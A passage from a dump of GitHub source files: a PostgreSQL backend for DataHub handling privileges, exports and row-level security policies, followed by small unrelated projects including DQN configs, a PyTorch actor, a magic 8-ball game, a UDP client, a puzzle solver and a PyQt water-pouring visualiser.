INSERT (\"append\")\n # d -- DELETE\n # D -- TRUNCATE\n # x -- REFERENCES\n # t -- TRIGGER\n # X -- EXECUTE\n # U -- USAGE\n # C -- CREATE\n # c -- CONNECT\n # T -- TEMPORARY\n # arwdDxt -- ALL PRIVILEGES (for tables, varies for other objects)\n # * -- grant option for preceding privilege\n # /yyyy -- role that granted this privilege\n\n collaborators = []\n for row in res['tuples']:\n # for reference, rows look like this:\n # ('username=UC/repo_base',)\n\n collab_obj = {}\n username = row[0].split('=')[0].strip()\n permissions = row[0].split('=')[1].split('/')[0]\n\n collab_obj['username'] = username\n collab_obj['db_permissions'] = permissions\n\n collaborators.append(collab_obj)\n\n return collaborators\n\n def has_base_privilege(self, login, privilege):\n \"\"\"\n returns True or False for whether the user has privileges for the\n repo_base (database)\n \"\"\"\n query = 'SELECT has_database_privilege(%s, %s);'\n params = (login, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def has_repo_db_privilege(self, login, repo, privilege):\n \"\"\"\n returns True or False for whether the use has privileges for the\n repo (schema)\n \"\"\"\n query = 'SELECT has_schema_privilege(%s, %s, %s);'\n params = (login, repo, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def has_table_privilege(self, login, table, privilege):\n query = 'SELECT has_table_privilege(%s, %s, %s);'\n params = (login, table, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def has_column_privilege(self, login, table, column, privilege):\n query = 'SELECT has_column_privilege(%s, %s, %s, %s);'\n params = (login, table, column, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def export_table(self, table_name, file_path, file_format='CSV',\n delimiter=',', header=True):\n words = table_name.split('.')\n for word in words[:-1]:\n self._check_for_injections(word)\n self._validate_table_name(words[-1])\n\n self._check_for_injections(file_format)\n\n query = 'SELECT * FROM %s' % table_name\n self.export_query(\n query,\n file_path,\n file_format=file_format,\n delimiter=delimiter,\n header=header)\n\n def export_view(self, view_name, file_path, file_format='CSV',\n delimiter=',', header=True):\n words = view_name.split('.')\n for word in words[:-1]:\n self._check_for_injections(word)\n self._validate_table_name(words[-1])\n\n self._check_for_injections(file_format)\n\n query = 'SELECT * FROM %s' % view_name\n self.export_query(\n query,\n file_path,\n file_format=file_format,\n delimiter=delimiter,\n header=header)\n\n def export_query(self, query, file_path, file_format='CSV',\n delimiter=',', header=True):\n \"\"\"\n Runs a query as the current user and saves the result to a file.\n\n query can be a sql query or table reference.\n \"\"\"\n header_option = 'HEADER' if header else ''\n query = query.split(';')[0].strip()\n\n self._check_for_injections(file_format)\n self._check_for_injections(header_option)\n\n meta_query = 'COPY (%s) TO STDOUT WITH %s %s DELIMITER %s;'\n params = (AsIs(query), AsIs(file_format),\n AsIs(header_option), delimiter)\n\n cur = self.connection.cursor()\n query = cur.mogrify(meta_query, params)\n\n # Store pending exports in a temporary location so they're aren't\n # discoverable while being exported.\n tmp_path = '/tmp/user_exports/{0}-{1}'.format(\n uuid4().hex, hashlib.sha256(query).hexdigest())\n try:\n os.makedirs('/tmp/user_exports')\n except OSError as e:\n 
if e.errno != errno.EEXIST:\n raise e\n\n try:\n with open(tmp_path, 'w') as f:\n cur.copy_expert(query, f)\n except psycopg2.Error as e:\n # Delete the temporary files of failed exports.\n os.remove(tmp_path)\n _convert_pg_exception(e)\n finally:\n cur.close()\n # Move successful exports into the user's data folder.\n # os.rename() would fail here if /tmp and /user_data are stored on\n # different filesystems, so use shutil.move() instead.\n shutil.move(tmp_path, file_path)\n\n def import_file(self, table_name, file_path, file_format='CSV',\n delimiter=',', header=True, encoding='ISO-8859-1',\n quote_character='\"'):\n\n header_option = 'HEADER' if header else ''\n\n words = table_name.split('.')\n for word in words[:-1]:\n self._check_for_injections(word)\n self._validate_table_name(words[-1])\n self._check_for_injections(file_format)\n\n query = 'COPY %s FROM %s WITH %s %s DELIMITER %s ENCODING %s QUOTE %s;'\n params = (AsIs(table_name), file_path, AsIs(file_format),\n AsIs(header_option), delimiter, encoding, quote_character)\n try:\n self.execute_sql(query, params)\n except Exception as e:\n self.execute_sql('DROP TABLE IF EXISTS %s', (AsIs(table_name),))\n raise ImportError(e)\n\n # Try importing using dbtruck. Was never enabled by anant.\n # RogerTangos 2015-12-09\n # return self.import_file_w_dbtruck(table_name, file_path)\n\n def import_rows(self, repo, table, rows, delimiter=',', header=False):\n # if there was a header, remove it\n if header:\n rows = rows[1:len(rows)]\n\n query = 'INSERT INTO %s.%s values '\n params = [AsIs(repo), AsIs(table)]\n\n # prepare query\n all_row_array = []\n for row in rows:\n\n # split the string into an array\n row = row.split(delimiter)\n\n # add the objects to params\n params += row\n\n # turn every item in the array into a %s\n # and make a string out of it\n row_array = ['%s' for c in row]\n row_array = ', '.join(row_array)\n row_array = '(' + row_array + ')'\n\n all_row_array.append(row_array)\n\n all_row_string = ', '.join(all_row_array)\n\n # finalize the query and params\n query += all_row_string\n params = tuple(params)\n\n res = self.execute_sql(query, params)\n return res['status']\n\n def import_file_w_dbtruck(self, table_name, file_path):\n # dbtruck is not tested for safety. At all. 
It's currently disabled\n # in the project RogerTangos 2015-12-09\n from dbtruck.dbtruck import import_datafiles\n # from dbtruck.util import get_logger\n from dbtruck.exporters.pg import PGMethods\n\n dbsettings = {\n 'dbname': self.repo_base,\n 'hostname': self.host,\n 'username': self.user,\n 'password': self.password,\n 'port': self.port,\n }\n\n create_new = True\n errfile = None\n\n return import_datafiles([file_path], create_new, table_name, errfile,\n PGMethods, **dbsettings)\n # Methods for Licenses\n\n def create_license_schema(self):\n public_role = settings.PUBLIC_ROLE\n schema = settings.LICENSE_SCHEMA\n self._check_for_injections(public_role)\n self._check_for_injections(schema)\n query = 'CREATE SCHEMA IF NOT EXISTS %s AUTHORIZATION %s'\n params = (AsIs(schema), AsIs(public_role))\n\n return self.execute_sql(query, params)\n\n def create_license_table(self):\n schema = settings.LICENSE_SCHEMA\n table = settings.LICENSE_TABLE\n public_role = settings.PUBLIC_ROLE\n\n self._check_for_injections(schema)\n self._validate_table_name(table)\n self._check_for_injections(public_role)\n\n query = ('CREATE TABLE IF NOT EXISTS %s.%s'\n '(license_id serial primary key,'\n 'license_name VARCHAR(40),'\n 'pii_def VARCHAR(100) NOT NULL,'\n 'pii_removed boolean NOT NULL,'\n 'pii_anonymized boolean NOT NULL);')\n params = (AsIs(schema), AsIs(table))\n self.execute_sql(query, params)\n\n # grant the public role access to the table\n query = ('GRANT ALL ON %s.%s to %s;')\n params = (AsIs(schema), AsIs(table), AsIs(public_role))\n\n return self.execute_sql(query, params)\n\n def create_license_link_table(self):\n schema = settings.LICENSE_LINK_SCHEMA\n table = settings.LICENSE_LINK_TABLE\n public_role = settings.PUBLIC_ROLE\n\n self._check_for_injections(schema)\n self._validate_table_name(table)\n self._check_for_injections(public_role)\n\n query = ('CREATE TABLE IF NOT EXISTS %s.%s '\n '(license_link_id serial primary key,'\n 'repo_base VARCHAR(40) NOT NULL,'\n 'repo VARCHAR(40) NOT NULL,'\n 'license_id integer NOT NULL);')\n params = (AsIs(schema), AsIs(table))\n self.execute_sql(query, params)\n\n query = ('GRANT ALL ON %s.%s to %s;')\n params = (AsIs(schema), AsIs(table), AsIs(public_role))\n\n return self.execute_sql(query, params)\n\n def create_license(\n self, license_name, pii_def, pii_anonymized, pii_removed):\n '''\n Creates a new license\n '''\n query = (\n 'INSERT INTO dh_public.license '\n '(license_name, pii_def, pii_anonymized, pii_removed) '\n 'values (%s, %s, %s, %s)')\n params = (license_name, pii_def, pii_anonymized, pii_removed)\n\n res = self.execute_sql(query, params)\n\n return res['status']\n\n def create_license_link(self, repo_base, repo, license_id):\n '''\n Creates a new license\n '''\n\n # check if link already exists\n query = ('SELECT license_link_id, repo_base, repo, license_id '\n 'FROM %s.%s where '\n 'repo_base = %s and repo = %s and license_id = %s;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_LINK_TABLE),\n repo_base, repo, license_id)\n\n res = self.execute_sql(query, params)\n\n if res['tuples']:\n return res['status']\n\n query = (\n 'INSERT INTO dh_public.license_link '\n '(repo_base, repo, license_id) '\n 'values (%s, %s, %s)')\n params = (repo_base, repo, license_id)\n\n res = self.execute_sql(query, params)\n\n return res['status']\n\n def find_license_links(self, license_id):\n '''\n finds all license_links associated with a given license_id\n '''\n query = ('SELECT license_link_id, repo_base, repo, license_id '\n 'FROM 
%s.%s ;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_LINK_TABLE))\n res = self.execute_sql(query, params)\n\n if not res['tuples']:\n return []\n\n return res['tuples']\n\n def find_license_links_by_repo(self, repo_base, repo):\n query = ('SELECT license_link_id, repo_base, repo, license_id '\n 'FROM %s.%s where repo_base = %s and repo = %s;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_LINK_TABLE),\n repo_base, repo)\n res = self.execute_sql(query, params)\n\n if not res['tuples']:\n return []\n\n return res['tuples']\n\n def find_licenses(self):\n '''\n find all licenses\n '''\n query = (\n 'SELECT license_id, license_name, pii_def, '\n 'pii_anonymized, pii_removed FROM %s.%s;')\n params = (AsIs(settings.LICENSE_SCHEMA), AsIs(settings.LICENSE_TABLE))\n\n res = self.execute_sql(query, params)\n return res['tuples']\n\n def find_license_by_id(self, license_id):\n query = (\n 'SELECT license_id, license_name, pii_def, '\n 'pii_anonymized, pii_removed '\n 'FROM %s.%s where license_id= %s;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_TABLE),\n license_id)\n\n res = self.execute_sql(query, params)\n\n # return None if the list is empty\n if not res['tuples']:\n return None\n\n # else, return the policy\n return res['tuples'][0]\n\n # Below methods can only be called from the RLSSecurityManager #\n\n def create_security_policy_schema(self):\n public_role = settings.PUBLIC_ROLE\n schema = settings.POLICY_SCHEMA\n self._check_for_injections(public_role)\n self._check_for_injections(schema)\n\n query = 'CREATE SCHEMA IF NOT EXISTS %s AUTHORIZATION %s'\n params = (AsIs(schema), AsIs(public_role))\n return self.execute_sql(query, params)\n\n def create_security_policy_table(self):\n schema = settings.POLICY_SCHEMA\n table = settings.POLICY_TABLE\n public_role = settings.PUBLIC_ROLE\n\n self._check_for_injections(schema)\n self._validate_table_name(table)\n self._check_for_injections(public_role)\n\n query = ('CREATE TABLE IF NOT EXISTS %s.%s'\n '('\n 'policy_id serial primary key,'\n 'policy VARCHAR(80) NOT NULL,'\n 'policy_type VARCHAR(80) NOT NULL,'\n 'grantee VARCHAR(80) NOT NULL,'\n 'grantor VARCHAR(80) NOT NULL,'\n 'table_name VARCHAR(80) NOT NULL,'\n 'repo VARCHAR(80) NOT NULL,'\n 'repo_base VARCHAR(80) NOT NULL'\n ');')\n params = (AsIs(schema), AsIs(table))\n self.execute_sql(query, params)\n\n # create indexes for faster seraching\n query = ('create index grantee_index on '\n 'dh_public.policy using hash(grantee); '\n\n 'create index grantor_index on '\n 'dh_public.policy using hash(grantor); '\n\n 'create index table_name_index on '\n 'dh_public.policy using hash(table_name); '\n\n 'create index repo_index on '\n 'dh_public.policy using hash(repo); '\n\n 'create index repo_base_index on '\n 'dh_public.policy using hash(repo_base);')\n\n # postgres 9.4 doesn't support IF NOT EXISTS when creating indexes\n # so it's possible for tests to attempt to create duplicate indexes\n # This catches that exception\n try:\n self.execute_sql(query)\n except:\n pass\n\n # grant the public role access to the table\n query = ('GRANT ALL ON %s.%s to %s;')\n params = (AsIs(schema), AsIs(table), AsIs(public_role))\n return self.execute_sql(query, params)\n\n def create_security_policy(self, policy, policy_type, grantee, grantor,\n repo_base, repo, table):\n '''\n Creates a new security policy in the policy table if the policy\n does not yet exist.\n '''\n\n # disallow semicolons in policy. 
This helps prevent the policy creator\n # from shooting themself in the foot with an attempted sql injection.\n # Note that we don't actually _need_ to do this. The parameters are all\n # escaped in RLS methods executed by the superuser, so there's not a\n # really a risk of a user acquiring root access.\n if ';' in policy:\n raise ValueError(\"\\';'s are disallowed in the policy field\")\n\n query = ('INSERT INTO dh_public.policy (policy, policy_type, grantee, '\n 'grantor, table_name, repo, repo_base) values '\n '(%s, %s, %s, %s, %s, %s, %s)')\n params = (policy, policy_type, grantee, grantor, table, repo,\n repo_base)\n\n res = self.execute_sql(query, params)\n\n return res['status']\n\n def find_all_security_policies(self, username):\n params = (username, username)\n\n query = ('SELECT policy_id, policy, policy_type, grantee, grantor '\n 'FROM dh_public.policy WHERE grantee = %s or '\n 'grantor = %s')\n\n res = self.execute_sql(query, params)\n return res['tuples']\n\n def find_security_policies(self, repo_base, repo=None, table=None,\n policy_id=None, policy=None, policy_type=None,\n grantee=None, grantor=None):\n '''\n Returns a list of all security polices that match the inputs specied\n by the user.\n '''\n query = ('SELECT policy_id, policy, policy_type, grantee, grantor '\n 'repo_base, repo, table_name '\n 'FROM %s.%s WHERE ')\n params = [AsIs(settings.POLICY_SCHEMA), AsIs(settings.POLICY_TABLE)]\n conditions = []\n\n # append mandatory passed-in conditions\n conditions.append('repo_base = %s')\n params.append(repo_base)\n\n # append optional conditions\n if repo:\n conditions.append('repo = %s')\n params.append(repo)\n if table:\n conditions.append('table_name = %s')\n params.append(table)\n if policy_id:\n conditions.append('policy_id = %s')\n params.append(policy_id)\n if policy:\n conditions.append('policy = %s')\n params.append(policy)\n if policy_type:\n conditions.append('policy_type = %s')\n params.append(policy_type)\n if grantee:\n conditions.append('grantee = %s')\n params.append(grantee)\n if grantor:\n conditions.append('grantor = %s')\n params.append(grantor)\n\n conditions = \" and \".join(conditions)\n params = tuple(params)\n query += conditions\n\n res = self.execute_sql(query, params)\n\n return res['tuples']\n\n def find_security_policy_by_id(self, policy_id):\n '''\n Returns the security policy that has a policy_id matching the input\n specified by the user.\n '''\n query = ('SELECT policy_id, policy, policy_type, grantee, grantor, '\n 'repo_base, repo, table_name '\n 'FROM dh_public.policy WHERE policy_id = %s')\n params = (policy_id,)\n res = self.execute_sql(query, params)\n\n # return None if the list is empty\n if not res['tuples']:\n return None\n\n # else, return the policy\n return res['tuples'][0]\n\n def update_security_policy(self, policy_id, new_policy, new_policy_type,\n new_grantee):\n '''\n Updates an existing security policy based on the inputs specified\n by the user.\n '''\n query = ('UPDATE dh_public.policy '\n 'SET policy = %s, policy_type = %s, '\n 'grantee = %s '\n 'WHERE policy_id = %s')\n params = (new_policy, new_policy_type, new_grantee, policy_id)\n\n res = self.execute_sql(query, params)\n return res['status']\n\n def remove_security_policy(self, policy_id):\n '''\n Removes the security policy from the policy table with a policy_id\n matching the one specified.\n '''\n query = 'DELETE FROM dh_public.policy WHERE policy_id = %s'\n params = (policy_id,)\n res = self.execute_sql(query, params)\n return res['status']\n\n def 
can_user_access_rls_table(self,\n username,\n permissions=['SELECT', 'UPDATE', 'INSERT']):\n '''\n Returns True if the has been granted specified type(s) of access to\n select/update/insert into the RLS policy table. Else, returns false.\n\n This must be executed from a connection to the\n settings.POLICY_DB database. Otherwise, it will check the wrong\n database, and (most likely) return fFalse\n '''\n query = (\"SELECT exists(\"\n \"SELECT * FROM %s.%s where grantee=lower(%s) and (\")\n\n conditions = [\"lower(policy_type)=lower(%s)\"] * len(permissions)\n conditions = \" or \".join(conditions)\n query += conditions + \"))\"\n\n params = (AsIs(settings.POLICY_SCHEMA),\n AsIs(settings.POLICY_TABLE),\n username) + tuple(permissions)\n\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n","repo_name":"datahuborg/datahub","sub_path":"src/core/db/backend/pg.py","file_name":"pg.py","file_ext":"py","file_size_in_byte":45439,"program_lang":"python","lang":"en","doc_type":"code","stars":211,"dataset":"github-code","pt":"77"} +{"seq_id":"74035773688","text":"from copy import deepcopy\n\ndqn_configuration = {\n 'Q_network': [\n ('conv1', {'filter_size': 8, 'stride': 4, 'num_filters': 16}),\n ('conv2', {'filter_size': 4, 'stride': 2, 'num_filters': 32}),\n ('fc1', {'num_relus': 256}),\n ('output', {}),\n ],\n 'Q_network_input_size': 84,\n 'var_init_mean': 0.0,\n 'var_init_stddev': 0.01,\n 'minibatch_size': 32,\n 'replay_memory_size': 10 ** 6,\n 'agent_history_length': 4,\n 'discount_factor': 0.99,\n 'action_repeat': 4,\n 'update_frequency': 4,\n 'learning_rate': 0.00025,\n 'rms_prop_decay': 0.95,\n 'gradient_momentum': 0.0,\n 'min_squared_gradient': 0.01,\n 'initial_exploration': 1,\n 'final_exploration': 0.1,\n 'final_exploration_frame': 10 ** 6,\n 'replay_start_size': 5 * (10 ** 4),\n 'no_op_max': 30,\n 'validation_size': 500,\n 'evaluation_exploration': 0.05,\n 'target_network_update_frequency': None,\n 'clip_error': False,\n}\n\ndqn_nips_configuration = deepcopy(dqn_configuration)\n\ndqn_nature_configuration = deepcopy(dqn_configuration)\ndqn_nature_configuration['target_network_update_frequency'] = 10 ** 4\ndqn_nature_configuration['Q_network'] = [\n ('conv1', {'filter_size': 8, 'stride': 4, 'num_filters': 32}),\n ('conv2', {'filter_size': 4, 'stride': 2, 'num_filters': 64}),\n ('conv3', {'filter_size': 3, 'stride': 1, 'num_filters': 64}),\n ('fc1', {'num_relus': 512}),\n ('output', {}),\n]\ndqn_nature_configuration['clip_error'] = True\n","repo_name":"chan-y-park/rl-atari","sub_path":"configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"29761914557","text":"import torch\n\nfrom .device import device\nfrom .base_network import BaseNetwork\n\nclass Actor(BaseNetwork):\n def __init__(self, state_size, action_size, hidden_size, activ):\n super().__init__(activ)\n\n dims = (state_size,) + hidden_size + (action_size,)\n\n self.build_layers(dims)\n\n self.reset_parameters()\n\n def forward(self, state):\n \"\"\"Maps state => actions, μ(s) => actions\"\"\"\n if type(state) != torch.Tensor:\n state = torch.FloatTensor(state).to(device)\n\n x = self.layers[0](state)\n\n for layer in self.layers[1:-1]:\n x = self.activ(layer(x))\n\n # We squash the the value between -1 and 1 (range of the actions)\n return torch.tanh(self.layers[-1](x)) # (-1, 
1)\n","repo_name":"jscriptcoder/Multi-Agent-Collaboration-and-Competition","sub_path":"agent/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"3628099119","text":"\"\"\"play a magic 8 ball game.\"\"\"\nimport random\nimport time\n\nwhile True:\n answer = [\"It is certain\", \"It is decidedly so\", \"Without a doubt\",\n \"Yes, definitely\", \"You may rely on it\", \"As I see it, yes\",\n \"Most likely\", \"Outlook good\", \"Yes\", \"Signs point to yes\",\n \"Reply hazy try again\", \"Ask again later\",\n \"Better not tell you now\",\n \"Cannot predict now\", \"Concentrate and ask again\",\n \"Don't count on it\", \"My reply is no\", \"My sources say no\",\n \"Outlook not so good\", \"Very doubtful\"]\n number = random.randint(1, len(answer))\n print()\n print(\"Welcome to the Magic 8 Ball\")\n question = input(\"Please ask a question: \")\n print(\"Thinking...\")\n time.sleep(3)\n for i in range(len(answer)):\n if i == number:\n print(answer[i])\n again = 1\n print(\"Do you want to play again?\")\n again = input(\"1 yes, 2 no: \")\n if again == str(2):\n break\n","repo_name":"erschmitt/Beginner-Python","sub_path":"Magic 8 Ball/ES-Magic8Ball.py","file_name":"ES-Magic8Ball.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37154731315","text":"import binascii\r\nimport socket\r\nimport struct\r\nimport binascii\r\nimport socket\r\nimport struct\r\nimport sys\r\nimport urllib\r\nimport urllib.request\r\n\r\n\r\n# Create a TCP/IP socket\r\n#def create_packet(s_n, a_n, ack, syn, fin, data_size):\r\n#\tdata = struct.pack('!IIcccI', s_n, a_n, ack, syn, fin, data_size)\r\n\r\n#\treturn data\r\n\r\n\r\n\r\n#if __name__=='__main__':\r\n# webpage = get_webpage(webpage=\"http://www.python.org\")\r\n# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n# ip = sys.argv[1]\r\n# port = int(sys.argv[2])\r\n# server_address = (ip, port)\r\n# buf = 512\r\n# r = open('test', 'rb')\r\n# total_read = 0\r\n# data_size = len(webpage)\r\n# print(data_size)\r\n# data = r.read(buf)\r\n# #print(data)\r\n# total_read += 512\r\n# send_data = create_packet(12345, 0, b'Y', b'N', b'N', data_size)\r\n# sock.sendto(data, server_address)\r\n #print(\"\\n\")\r\n #print(send_data)\r\n# while (total_read < 805):\r\n# if (sock.sendto(data, server_address)):\r\n# send_data = create_packet(12345, 0, b'Y', b'N', b'N', data_size)\r\n# data = r.read(buf)\r\n# print(data_size)\r\n# total_read += len(send_data)-12\r\n# print(total_read)\r\n\r\n# sock.close()\r\n# r.close()\r\n\r\n\r\ndef create_packet(s_n, a_n, ack, syn, fin, data_size):\r\n\tdata = struct.pack('!IIcccI', s_n, a_n, ack, syn, fin, data_size)\r\n\r\n\treturn data\r\n\r\n\r\ndef handshake(sock, server_address):\r\n\r\n\tsend_data = create_packet(12345, 0, b'Y', b'Y', b'N', 0)\r\n\tsock.sendto(send_data, server_address)\r\n\t#print(struct.unpack('!IIccc', data))\r\n\r\n\tdata, recv_addr = sock.recvfrom(512)\r\n\trecv_seqn, recv_ackn, ack, syn, fin, size = struct.unpack('!IIcccI', data)\r\n\r\n\r\n\tdataReturn = struct.pack('!IIcccI', 100, recv_ackn+1, b'Y', b'N', b'N', 0)\r\n\tprint(dataReturn)\r\n\r\n\treturn data, recv_addr\r\n\r\nif __name__=='__main__':\r\n\tip = sys.argv[1]\r\n\tport = int(sys.argv[2])\r\n\tfiledump = sys.argv[3]\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\tserver_address = (ip, 
port)\r\n\tdata, recv_addr = handshake(sock, server_address)\r\n\r\n\tnumber = 1\r\n\tnumber2 = 1\r\n\trecv_buf = []\r\n\tFIN_SET = 0\r\n\tfd = open(filedump, 'w')\r\n\r\n\twith open('recv_file', 'wb') as w:\r\n\t\twhile True:\r\n\t\t\tdata, address = sock.recvfrom(512)\r\n\t\t\tif number == number2:\r\n\t\t\t\tfd.write(\"Received connection from (IP, PORT): \")\r\n\t\t\t\tfd.write(str(address))\r\n\t\t\t\tfd.write(\"\\n\")\r\n\t\t\t\tnumber = number + 1\r\n\t\t\ttry:\r\n\t\t\t\tw.write(data)\r\n\t\t\t\tprint('Writing data')\r\n\t\t\texcept socket.timeout:\r\n\t\t\t\tsock.close()\r\n\t\t\t\tprint(\"File downloaded\")\r\n\t\t\tif FIN_SET:\r\n\t\t\t\tbreak\r\n\tfd.close()\r\n\tsock.close()\r\n\tr.close()\r\n","repo_name":"niikexr3mix/CSC4200","sub_path":"Pr2/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72629726970","text":"from django.shortcuts import render as origin_render\nfrom django.http import JsonResponse as origin_JsonResponse\n\n\ndef render(request, template_name, context=None):\n\n if not context:\n context = {}\n context[\"is_login\"] = False\n if request.user and request.user.id:\n context[\"is_login\"] = True\n return origin_render(request, template_name, context)\n\n\ndef JsonResponse(code, msg, data=None):\n if not data:\n data = {}\n return origin_JsonResponse({\"code\": code, \"msg\": msg, \"data\": data})\n","repo_name":"yukiYK/VPS_project","sub_path":"common/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5564129898","text":"from .claspy import *\nfrom . import utils\nimport time\n\ndef encode(string):\n return utils.encode(string)\n\ndef solve(E):\n set_max_val(E.R*E.C)\n\n shading_solver = utils.RectangularGridShadingSolver(E.R,E.C)\n\n for (r,c) in E.clues:\n require(~shading_solver.grid[(r,c)])\n\n anchors = [coord for coord in E.clues if E.clues[coord] != 'black']\n # 'black' means an empty circle in this case; sorry, I'm being lazy with the encoding\n\n for anchor in anchors:\n flows = utils.RectangularGrid(E.R, E.C, lambda: Atom())\n flows[anchor].prove_if(True) # prove the anchor for free\n\n for r in range(E.R):\n for c in range(E.C):\n for (dr,dc) in [(0,1),(0,-1),(1,0),(-1,0)]:\n r1 = r + dr\n c1 = c + dc\n if 0 <= r1 < E.R and 0 <= c1 < E.C:\n if (r1,c1) == anchor:\n flows[r][c].prove_if(shading_solver.grid[r][c])\n else:\n flows[r][c].prove_if(shading_solver.grid[r][c] & \n shading_solver.grid[r1][c1] & flows[r1][c1])\n\n require(sum_bools(E.clues[anchor]+1, \n [flows[r][c] for r in range(E.R) for c in range(E.C)]))\n # add 1 because the clue cell is proven but not black\n\n return shading_solver.solutions(shaded_color = 'black')\n\ndef decode(solutions):\n return utils.decode(solutions)\n","repo_name":"mstang107/noq","sub_path":"solvers/kurotto.py","file_name":"kurotto.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"27835513","text":"from TopicA4.DataDisplayUI import Ui_MainWindow\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QGridLayout\r\nfrom PyQt5.QtCore import QTimer\r\nimport sys\r\nimport numpy as np\r\n\r\n\"\"\"\r\n 在PyQt5设计的GUI界面中显示matplotlib绘制的图形\r\n https://blog.csdn.net/panrenlong/article/details/80183519\r\n \r\n\"\"\"\r\nfrom 
matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nfrom Pour import Pour\r\nfrom matplotlib.patches import Rectangle\r\n\r\n\r\n# from matplotlib.axes._subplots\r\n\r\nclass MyFifure(FigureCanvas):\r\n def __init__(self, parent=None, width=3.9, height=2.7, dpi=100):\r\n # 其中构造函数Figure()用来创建一个类似Matlab的figure()或matplotlib.pyplot的figure()。\r\n # 其中:width,height, 为窗口尺寸,5 英寸 * 4 英寸,分辨率为dpi = 10\r\n self.fig = Figure(figsize=(width, height), dpi=100)\r\n super(MyFifure, self).__init__(self.fig)\r\n # 它是用来创建子图,如图matlab的subplot(2,2,1),表示共有4个子图,当前为第一个子图。具体应用如下:\r\n self.ax = self.fig.add_subplot(111)\r\n print(type(self.ax))\r\n\r\n def test(self):\r\n x = [1, 2, 3, 4, 5, 6, 7]\r\n y = [2, 1, 3, 5, 6, 4, 3]\r\n\r\n #\r\n self.ax.plot(x, y)\r\n\r\n\r\nclass ImgDisp(QMainWindow, Ui_MainWindow):\r\n def __init__(self, parent=None):\r\n super(ImgDisp, self).__init__(parent)\r\n self.pathList = list()\r\n self.setupUi(self)\r\n self.PrepareBarCanvas()\r\n self.timer = QTimer()\r\n self.timer.timeout.connect(self.UpdateImgs)\r\n self.pb_start.clicked.connect(self.startShow)\r\n self.pb_sure.clicked.connect(self.reSetBar)\r\n self.pb_reSet.clicked.connect(self.reSetBar)\r\n self.updateList = list()\r\n\r\n def Init_Widgets(self):\r\n date = str(self.plainTextEdit.toPlainText()).split()\r\n print(date)\r\n date = list(int(_) for _ in date)\r\n # 水壶容量\r\n self.capacity = tuple(date[:3])\r\n # 初始时,水壶中水的情况\r\n self.situation = date[3:-1]\r\n self.endD = date[-1]\r\n\r\n def startShow(self):\r\n self.pour()\r\n self.timer.start(2)\r\n\r\n def reSetBar(self):\r\n self.Init_Widgets()\r\n self.BarFigure.ax.cla()\r\n self.repeatDrawBar(self.situation)\r\n self.BarFigure.draw()\r\n\r\n def repeatDrawBar(self, s):\r\n self.BarFigure.ax.set_xlim(-1, 7)\r\n self.BarFigure.ax.set_ylim(0, max(self.capacity) + 2)\r\n self.bar = self.BarFigure.ax.bar(np.array([0, 3, 6]), np.array(s),\r\n color=['#d65f5f', '#5fba7d', '#abcdef'], width=0.6)\r\n self.patches = self.bar.patches\r\n for i, r in enumerate(self.patches):\r\n r.set_label('capacity:{:^3d}'.format(self.capacity[i]))\r\n\r\n def PrepareBarCanvas(self):\r\n self.Init_Widgets()\r\n self.BarFigure = MyFifure()\r\n self.BarFigureLayout = QGridLayout(self.BarDisplayGB)\r\n self.BarFigureLayout.addWidget(self.BarFigure)\r\n self.repeatDrawBar(self.situation)\r\n self.BarFigure.draw() # 开始绘制\r\n self.patches = self.bar.patches\r\n\r\n def pour(self):\r\n pour = Pour(self.capacity, self.situation, self.endD)\r\n pour.run()\r\n path = pour.pathList\r\n\r\n # 以0.1的水量为迭代倒水\r\n for i, p in enumerate(path[1:]):\r\n p = list(p)\r\n a, b = p[-3:-1]\r\n length = p[-1]\r\n temp = list(path[i]).copy()\r\n for _ in np.arange(0, length, 0.1):\r\n temp[a] = temp[a] - 0.1\r\n temp[b] = temp[b] + 0.1\r\n self.pathList.append(temp[:3])\r\n\r\n def UpdateImgs(self):\r\n if len(self.pathList) == 0:\r\n print(\"关闭\")\r\n self.timer.stop()\r\n return None\r\n self.BarUpdate(self.pathList.pop(0))\r\n\r\n def BarUpdate(self, heights):\r\n x = np.array(heights).astype(float)\r\n print(x)\r\n for i, rectangle in enumerate(self.patches):\r\n rectangle: Rectangle\r\n rectangle.set_height(x[i])\r\n rectangle.set_label('capacity:{:^3d}'.format(self.capacity[i]))\r\n self.BarFigure.ax.text(i * 3 - 0.3, self.capacity[i] + 0.2,\r\n '{:^4.2f}/{:^3d}'.format(float(x[i]), self.capacity[i]))\r\n\r\n self.bar.patches = self.patches\r\n self.BarFigure.ax.legend()\r\n self.BarFigure.draw() # 开始绘制\r\n self.BarFigure.ax.cla()\r\n 
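# cla() wipes the axes, so the bar chart is rebuilt at the new heights\r\n 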
